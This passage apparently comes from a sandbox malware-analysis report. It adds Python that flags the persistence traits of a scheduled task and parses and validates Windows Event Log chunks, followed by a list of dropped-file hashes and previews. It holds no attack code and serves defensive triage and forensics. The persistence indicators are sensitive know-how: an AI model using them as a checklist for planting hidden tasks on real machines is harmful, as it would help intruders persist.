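    root = ET.fromstring(xml_text)

    def text(path: str) -> str:
        el = root.find(path, NS)
        return el.text.strip() if el is not None and el.text else ""

    triggers_el = root.find("t:Triggers", NS)
    triggers = [child.tag.rsplit("}", 1)[-1]
                for child in (triggers_el if triggers_el is not None else [])]
    commands = [c.text.strip() for c in root.iterfind(".//t:Exec/t:Command", NS) if c.text]
    return {
        "uri": text("t:RegistrationInfo/t:URI"),
        "date": text("t:RegistrationInfo/t:Date"),
        "triggers": triggers,
        "run_level": text(".//t:Principal/t:RunLevel"),
        "group_id": text(".//t:Principal/t:GroupId"),
        "user_id": text(".//t:Principal/t:UserId"),
        "commands": commands,
    }


def persistence_findings(summary: dict) -> list:
    """Name each property that makes the task a persistence mechanism."""
    findings = []
    if "LogonTrigger" in summary["triggers"]:
        findings.append("runs at every interactive logon (LogonTrigger)")
    if summary["run_level"] == "HighestAvailable":
        findings.append("requests the HighestAvailable run level")
    if summary["group_id"].lower().endswith("\\users"):
        findings.append("principal is the builtin\\Users group, so it fires for any logging-on user")
    if not summary["uri"].lower().startswith("\\microsoft\\"):
        findings.append(f"registered outside the \\Microsoft\\ tree as {summary['uri']!r}")
    return findings


if __name__ == "__main__":
    summary = summarize_task(decode_task_xml(SAMPLE_TASK_BYTES))
    for line in persistence_findings(summary):
        print("-", line)
```

Point the same two functions at every file under C:\Windows\System32\Tasks to triage a host. One caveat: HighestAvailable only yields an elevated token when the logging-on user is also an administrator; for a standard user the task runs unelevated, so treat the finding as attempted, not confirmed, elevation.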
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.34726597513537405
                                        Encrypted:false
                                        SSDEEP:3:Nlll:Nll
                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                        Malicious:false
                                        Preview:@...e...........................................................
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):67544
                                        Entropy (8bit):4.0712678390554755
                                        Encrypted:false
                                        SSDEEP:768:klOIW3Wmdcmbk9nP5tH15QaVhL0KXSvPEsghcVrbk:dc8KPL0KXSvPEs6c1k
                                        MD5:02AA72479E71CFBBA879BC09D5BC4EFC
                                        SHA1:5BA3C7FDA8249DBE10CBEF1505195454D82C11CD
                                        SHA-256:4DD0E9244C9B4396DB449A66AD244CD097EFC67AFF8E0AB2A1835A4323F0F452
                                        SHA-512:6CBC8805BFB296150DFE3F2773C7D30615B88235B955A804B83CA7544F365E4447FF0F3C514AA99D23B870CAB1F5B55D12375C1BA36EAA61F9BBC040C741C7E8
                                        Malicious:false
                                        Preview:ElfChnk.....................................(..........y....................................................................w.lK............$...............................=...........................................................................................$...............................m...............F...........................t...................M...c...........................t...............................................................................................................&.......**..............HLse..............&.....................................................................................!...d.............HLse...........................w.)Ct...................p.o.w.e.r.s.h.e.l.l...e.x.e...1.0...0...1.9.0.4.1...5.4.6...7.e.d.a.4.1.1.5...u.n.k.n.o.w.n...0...0...0...0...0.0.0.0.0.0.0.0...0.0.0.0.0.0.0.0...0.0.0.0.7.f.f.d.3.4.4.4.3.7.3.3...1.b.b.0...0.1.d.b.1.5.9.3.6.2.1.6.2.4.f.9...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l
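The svchost.exe-dropped files whose preview starts with "ElfChnk" are 64 KiB chunks of Windows Event Log (.evtx) files, written by the Event Log service that runs inside svchost.exe; the sizes of exactly 65536 bytes match the fixed chunk size, and the "**" visible further into each preview is the signature that opens every event record. libmagic reports them as "data" (and, for two entries below, misidentifies them as thermal-camera dumps) because a chunk on its own lacks the "ElfFile" header that identifies a whole log file. The following is an added example, not code from the Joe Sandbox report or the sample: it recognises a bare chunk, parses its 512-byte header, and verifies the two CRC32 fields, which is how a forensic parser decides whether a recovered chunk is intact. The field layout follows the libevtx format documentation; the chunk that build_chunk() produces is constructed sample input, not one of the dropped files.

```python
"""Identify and validate a Windows Event Log (.evtx) chunk from its header.

Added example, not code from the Joe Sandbox report. Field layout follows the
libevtx format documentation; build_chunk() produces constructed sample input.
"""
import struct
import zlib
from dataclasses import dataclass
from typing import Iterator

CHUNK_SIZE = 0x10000            # every chunk is 64 KiB, matching the dropped-file sizes
CHUNK_MAGIC = b"ElfChnk\x00"    # the "ElfChnk" at the start of each preview
RECORD_MAGIC = b"**\x00\x00"    # the "**" that precedes each event record
HEADER_SIZE = 0x80              # fixed header; string/template offset tables follow it
RECORDS_START = 0x200           # event records begin after the offset tables
RECORD_HEADER_LEN = 24          # magic(4) size(4) record id(8) FILETIME(8)


@dataclass
class ChunkHeader:
    first_record_number: int
    last_record_number: int
    first_record_id: int
    last_record_id: int
    header_size: int
    last_record_offset: int
    free_space_offset: int
    records_crc: int
    header_crc: int


def header_crc32(chunk: bytes) -> int:
    """CRC32 over bytes 0..0x78 and 0x80..0x200: the whole 512-byte header
    except the 4 flag bytes and the checksum field itself."""
    return zlib.crc32(chunk[:0x78] + chunk[0x80:RECORDS_START]) & 0xFFFFFFFF


def parse_chunk_header(chunk: bytes) -> ChunkHeader:
    """Parse the header; raise ValueError when the ElfChnk magic is missing."""
    if len(chunk) < RECORDS_START or chunk[:8] != CHUNK_MAGIC:
        raise ValueError("not an EVTX chunk: missing ElfChnk magic")
    fields = struct.unpack_from("<4Q4I", chunk, 8)
    (header_crc,) = struct.unpack_from("<I", chunk, 0x7C)
    return ChunkHeader(*fields, header_crc)


def chunk_is_intact(chunk: bytes) -> bool:
    """True when magic, header size and both CRC32 fields agree with the content."""
    try:
        h = parse_chunk_header(chunk)
    except ValueError:
        return False
    if h.header_size != HEADER_SIZE or h.header_crc != header_crc32(chunk):
        return False
    if not RECORDS_START <= h.free_space_offset <= len(chunk):
        return False
    records = chunk[RECORDS_START:h.free_space_offset]
    return h.records_crc == (zlib.crc32(records) & 0xFFFFFFFF)


def iter_records(chunk: bytes) -> Iterator[tuple]:
    """Yield (record id, FILETIME, binary-XML payload) for each record in the chunk."""
    h = parse_chunk_header(chunk)
    off = RECORDS_START
    while off + RECORD_HEADER_LEN + 4 <= h.free_space_offset:
        if chunk[off:off + 4] != RECORD_MAGIC:
            break
        size, record_id, written = struct.unpack_from("<IQQ", chunk, off + 4)
        if size < RECORD_HEADER_LEN + 4 or off + size > h.free_space_offset:
            break
        yield record_id, written, chunk[off + RECORD_HEADER_LEN:off + size - 4]
        off += size


def build_record(record_id: int, filetime: int, payload: bytes) -> bytes:
    """Construct one record: header, payload, trailing copy of the size (sample input)."""
    size = RECORD_HEADER_LEN + len(payload) + 4
    return RECORD_MAGIC + struct.pack("<IQQ", size, record_id, filetime) + payload + struct.pack("<I", size)


def build_chunk(records: list) -> bytes:
    """Construct a chunk holding (id, FILETIME, payload) records with both
    checksums filled in. Record numbers are set equal to record ids here; in a
    real file they differ. Constructed sample input for the parser above."""
    body = bytearray(CHUNK_SIZE)
    area = b"".join(build_record(*r) for r in records)
    ids = [r[0] for r in records] or [0]
    offsets = [RECORDS_START]
    for r in records[:-1]:
        offsets.append(offsets[-1] + len(build_record(*r)))
    free_off = RECORDS_START + len(area)
    body[:8] = CHUNK_MAGIC
    struct.pack_into("<4Q4I", body, 8, ids[0], ids[-1], ids[0], ids[-1],
                     HEADER_SIZE, offsets[-1], free_off, zlib.crc32(area) & 0xFFFFFFFF)
    body[RECORDS_START:free_off] = area
    struct.pack_into("<I", body, 0x7C, header_crc32(bytes(body)))
    return bytes(body)
```

Running chunk_is_intact() over each 64 KiB dropped file distinguishes a clean chunk from one that was truncated or tampered with; the payload that iter_records() returns is binary XML and still needs a BinXml decoder (the string and template tables at 0x80..0x200 exist for that step) before the event text can be read.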
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.844757629881363
                                        Encrypted:false
                                        SSDEEP:384:5he6UHi2uepX7xasnPC3FzFtpFDhFPFyF842xDmSyVflkWiVytr1jSmKbC93ZmLH:5VUHiapX7xadptrDT9W84R9RNdlJEt
                                        MD5:6DD9513F9459922C47E5DA7D177B65ED
                                        SHA1:22141C6315B5E37BF885AA1B2D611BB4A7B85186
                                        SHA-256:EEE9440984A354B116F442B7E64D4754847E667C0A90A6AD38DD990371A09086
                                        SHA-512:3D40609D277197F9249A917D3890960F419CB78B47A68CE5A74A902AC069DBAB781C33A104E21C8A12B5C484EACBB00783FE8F1AC48752C24709B833AAAE5F1C
                                        Malicious:false
                                        Preview:ElfChnk.........H...............H....................u3.......................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...............................................N...........&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 13321401407157305344.000000
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.375898877258491
                                        Encrypted:false
                                        SSDEEP:384:GhzN7UN0HN9NINoNaNxNUN7N+N8NXNINCXNGNXNNaYNXa4NvNhnNFNENNhSNEcNV:GDttjfckEwpQTB1cuat3x9
                                        MD5:C9340739814935979F6E070F71B429C3
                                        SHA1:5D5883156D59CE1BFCCE51E8B05190DACBD63C4D
                                        SHA-256:C73213B06AE8111F7F5E76AA12A63FBD173A2BF1072D07B0D1BEE6C91C722160
                                        SHA-512:23A7490C2F62515367EB614618910117A79AC4A42A0C9815C8194D47F4D8A978DB5A0D1F503BC6B07A2433DB05EB8F7582289AEDF7062C3D1B735049825CF459
                                        Malicious:false
                                        Preview:ElfChnk.x...............x.............................r.....................................................................].B.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................{..........................&.......................MX......]...................................................................**......x.......G.".U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.264354582178037
                                        Encrypted:false
                                        SSDEEP:384:Fh/VNVbVyVgF/WWVnVyVqVmVXV5VX64VX7XjVXEVXVrVX9V6rV67UVjOVsVlVMVi:FeIiXkrtrA
                                        MD5:C6400C7B146761CB15420263DFB8E4D6
                                        SHA1:D76DC09E0EA8585133147E6E8676665559D02266
                                        SHA-256:4296D6D34D230E1E5A8DC9CAF9EC35CC88FC94DA08B97D0DAFDEF75FDCCB615B
                                        SHA-512:840935AC15EBD3C5CE65C564C095B492DB056EA659BFC19C8E22BA7F9F4BF85825D745327F362CDDEEA01866343731943457C3912B89154C57BEEFE205D6E4BD
                                        Malicious:false
                                        Preview:ElfChnk.I.......L.......I.......L...................R........................................................................%C.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..(...I...........W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.213049085236613
                                        Encrypted:false
                                        SSDEEP:384:fh+m3shOg26Qm6mt3m+DmqkTmETiImombmtmgmRmvhmCmGImchm7mBmImwmtmHm2:fNCOg26Dk1TisCzjECrXqm
                                        MD5:C142C52B34FFDA11B1B98479A7FD083A
                                        SHA1:46E3403362EDEE1AA85FA9304DCCF2786938FBD6
                                        SHA-256:EE26845A028E718A3FCB180BB07B1B944DA0C876313A24EDA336A7BAF53D49C9
                                        SHA-512:1198A7AA1C55DD65542CBEA8A567A910645D6A167B02692C5C8E33F9AB40644BE233589181B7F67263324DEB1A661BE95E964607F1C680C7EFC8EDBED5E1E2C7
                                        Malicious:false
                                        Preview:ElfChnk..0.......0.......0.......0...................:8O....................................................................Z...................P.......................x...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...............................)...................................................................**.......0......f6..W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.5175878656905681
                                        Encrypted:false
                                        SSDEEP:96:NxNVaO8sMa3Z85ZML7b2rjjc3Z85ZRp3Z85Zu3Z85ZA3Z85Zu:dV7pp8nMLmvcp8nbp8nup8nAp8n
                                        MD5:029D7554985B090DC6DBFABABE797D2B
                                        SHA1:CE2BADFA905B622CA8393B94D1B37B8BA2C6A5BE
                                        SHA-256:750B5C33A9E92540F700EBFBFABA4ACE63A6F28E5AE563954A5DC86ACD53C641
                                        SHA-512:B830C971334C8358532FC93D3CFBBF09757B3B1F6F7169DEC706D7E23B21B81F43A945187C74E7971B2E86450458B40A952832ECDD43C7EB9577902D7CC6E70D
                                        Malicious:false
                                        Preview:ElfChnk.........................................0...W.......................................................................o.F.............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.6213104887740535
                                        Encrypted:false
                                        SSDEEP:768:0PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9hFUKjSxw:wXY5nVYIyyqED5BVZUe7NrVnL3K9fYS
                                        MD5:94CE283335713D796E068233C0D27233
                                        SHA1:8B154CE1AEB28021DFE8B3FE78D322210537769A
                                        SHA-256:619E945769B0AFB1D3097B0FD8D85539C20F3024E47A98CAAB23DCA2F089EE2E
                                        SHA-512:5DAFBD530019133D08737F49D10DFF926CAD9D665588F800D18B6F3321FFB1EF7C7C2D61F0AD30C1084ECD2086D90E7099A7A9E0AADD3DC8AA047B51D75879B6
                                        Malicious:false
                                        Preview:ElfChnk.....................................x...X....#.N........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):72248
                                        Entropy (8bit):2.2795904296119502
                                        Encrypted:false
                                        SSDEEP:384:82oJWoIyLFocoIyhKoloIymGouoIyFLoAoIy1hdo69CcoTorNorWorbvorTorZou:8DmXnEDCo0bcdyR87mVDmXn
                                        MD5:B2617277E4062C404EF94A593A0662E2
                                        SHA1:9E8401F0DA08572A16E10BAA13AD65F447AC09F2
                                        SHA-256:D0C09DAB5161D301D014340AA9CBCB8043F727366A14A439C18F8BE322052909
                                        SHA-512:F517EF84F75BE0D780CC86E8DFF83F47FA0343D7032590CC4B0607E5BEABAF4C55E401B91AA82978EF75DA035D4C285A8D9669FF09B574777BCA7E2937A581D1
                                        Malicious:false
                                        Preview:ElfChnk.........*...............*........... d..Xf.....@.....................................................................Q..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................%5...................................0...............*..............................**......!.........,`...........Z7;................................................................>.......V...=.!..o................,`....g..TW...5l.TW.......H...!....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`.0..................l...............N.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 206.521484
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8818863793721268
                                        Encrypted:false
                                        SSDEEP:384:PhAiPA5PNPxPEPHPhPEPmPSPRP3PoP5PUZPDPBPrPTP:P2N7
                                        MD5:ABC20FF1642044E1CCE03170FDE15383
                                        SHA1:8FA47598A436BFAC1C60AA663BBA85ED65684EB3
                                        SHA-256:335CB1E45B8A1EBDC3714F6744B8AA7332FD8A88C296A4FC03F300D1417CCE8D
                                        SHA-512:262570D8EAB15F9A890B7FFC26B6E6D6615B2659120D7595D2E14A2DB9394EF043B475F1B00239C9E59577821EEC69441C5964D8250CAA7C623FAF497735E839
                                        Malicious:false
                                        Preview:ElfChnk......................................&.. (...........................................................................c..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8732041818438444
                                        Encrypted:false
                                        SSDEEP:384:ihZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+ly:iWXSYieD+tvgzmMvpgNNr/C
                                        MD5:B693B4CC631594D7178A17D644604830
                                        SHA1:010015CDCBAC9449FB75222B3ADAA84725A573E2
                                        SHA-256:2AB6A0ED88C441E535930D7653055EFB046C8E0D20409B95E70F6203B05B770E
                                        SHA-512:2625F3E08A6C17703CD43E2FE6FE6DC8B1096D4BCF3DE77DE75882E923AC278A0F24E21C43644A4909F21E2DF827CDF967C53ECA1D35D18BCAB453309C55546C
                                        Malicious:false
                                        Preview:ElfChnk......................................&...'..... .......................................................................................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................&...................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.23271898573425
                                        Encrypted:false
                                        SSDEEP:384:IhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28n:IbCyhLfI49L
                                        MD5:7519EF202B45BC45640AD3012DD0C940
                                        SHA1:407729CF0DC25506E911AC35557655CFBCD2F36B
                                        SHA-256:8793E9E7F83C6B9EA6233F49E2B9A1C239C27893F13B80E7F16AE18B590D9050
                                        SHA-512:0CF0F7BB4C890A69440309AF564D1D5A17E863933E6FB8A748D95991A96BDC502250689B8F77303AAF0A4199E60D2D9F78C95A84D4314A10008582AE192CA33F
                                        Malicious:false
                                        Preview:ElfChnk.........O...............O....................6~....................................................................b.S.................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................n..........n.......................................................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.49826648366803
                                        Encrypted:false
                                        SSDEEP:768:TcMhFBuyKskZljdoKXjtT/r18rQXn8x3F4mLvgpaCm:gMhFBuV
                                        MD5:AB93827437B5DF686B7D01F7C4D83EB5
                                        SHA1:1BE09D7F9A36BE1734B4B96BC0F31EB3CA05E2E9
                                        SHA-256:7BABE1319C38F7CED4F495F293BE61A2CEECAEDCBCABB6286127B8555C259A06
                                        SHA-512:804E69A2314D8DD83104F49BB272E07AAE12CAE3C5582BF6EE259172B4035C29D47DC3BA0278A9F1154DF8E64AA57C0E88D25FE45C372FE2EB5A100573814F5B
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.792827407520075
                                        Encrypted:false
                                        SSDEEP:768:nVQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaYBnUm3iKLnn4eDB7:0Ht3iKLn
                                        MD5:152A48624B4DFD0D038B4FA3623BA7E7
                                        SHA1:5678AC8B8E8F29A58EA8D43EF57FFF9A6FDAEC28
                                        SHA-256:C4F9B02538E32C9F8583CACBBFA7C43453C03CEFEE70EC5DEB0194E96197BF49
                                        SHA-512:CB23A12137680CFD7B86FE67A4551D33CC727AE1F1EB5EB981D0DB7DB77F2F9A034AE08BEF109FFF080DC98467674369E675B06D768983E4BB15C819F3D4FE8E
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.8858919329531718
                                        Encrypted:false
                                        SSDEEP:384:Nh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDg:NMAP1Qa5AgfQQlke9a6
                                        MD5:B66301CC0555CC995B4374B6FF0F39E5
                                        SHA1:63D7895AAD4EA9BCDAF4D3BFB2911FBC3B316613
                                        SHA-256:C056C5B1E6C58773FC9A75C46E8CC74E855A1620D21D2FF3D0AA34CEA380165C
                                        SHA-512:5A40E2618146D20A0F89943A7155FF211302643CC0D70684CF86363E303D3887625366AF85D5B538C317E70DF3DE30193CE0CE5660FF52756CEF46AFFBBA11FB
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.428876543896683
                                        Encrypted:false
                                        SSDEEP:384:vKhrEbExnEO4+EUEtEjEXE7LpEn7AEmxEsE27jE/iCESWQHEPEX5EwE2Ex7zEuEq:SfZRLvz75hyME8
                                        MD5:3E00DDA6A4D097354A6D64995B6F5637
                                        SHA1:37446C0346A6195D226249D251E7C8B5D9BA8EE9
                                        SHA-256:47B00BC6744A8886BE9ADAFE8E7C95FF08511038E35F12C66B74643326A29582
                                        SHA-512:1F2E1ABB9AFB705BA7E3C37B8A3DDB3EC180F83F2DBBD82C0AFA95EB37633057D9C5F4F0F76610CAC954FEACB1B7D6223B689A27628B3C69E1223CA216FB4AEC
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.462764563871168
                                        Encrypted:false
                                        SSDEEP:384:5hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klc:51T4hImaVqA
                                        MD5:90C7B97351EB8C1E5D63C95F98DA7DC2
                                        SHA1:BCA659CC6F082891275AC1DE0DBCF11874239D97
                                        SHA-256:6E033AC321438132DD42CEF1729149128602226619B68BACC8509AA2C3BF7959
                                        SHA-512:E73206F70E009C1446EA7BA550901B9AF4F43CE0EBDA17DE514E3F55A65264490A24034BCEA90F88C9B0FE6FCED2CF9E970C85E969DB39C9374CF0A2F5AF8F9A
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.543522413880544
                                        Encrypted:false
                                        SSDEEP:384:AhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfk:AzSKEqsMuy6/ij
                                        MD5:A7C99371DDFC5A4213129E4CACAFCBC1
                                        SHA1:DD3ED05CE634AA129B7F1385424AFB489F50C66A
                                        SHA-256:ED6442E39002736D07EE523A96024EB370A0E69A127E042D0EEA7C98F466831C
                                        SHA-512:E6642A332446467BF9D5DF8FF402EDF4184CA26FC50D8D224FFBDF0504E8B0E750BCC6664E9AE3F84BBC1A9E8F945F3D77B8BAF8F3A2E4FD971FD6EEC6E1E4B2
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.24409357808026
                                        Encrypted:false
                                        SSDEEP:384:mhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zS:mmw9g3LYx
                                        MD5:3E92F94FE6AA3FDC475D1591EF7E2704
                                        SHA1:B078DB603A5949847827FFD1EA107D357C22D6F8
                                        SHA-256:FD11BA3444675A33C4263FEAFDC9DD37E8061968D02E9BB4800B7E22D123DEB9
                                        SHA-512:A5362EB798F2F827B99F074F72D5B1208BDC89A23F152C85C3C8F9200B217F9F3E415A42B59D00D0DA765992DB085A9E47F63AC273404C95C914351150A8A4E8
                                        Malicious:false
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9546787598621266
                                        Encrypted:false
                                        SSDEEP:192:ssgV71IUKGGk4yb27x1IMb27kdI2dIeWIbTcc2eI5Tcc:8h1IUbGk4NIsIKINIDI
                                        MD5:BA45982149D644A9243DF5BA6EB08A81
                                        SHA1:6DD8A1A7503D8323B24669AE91EA9C1308E30B15
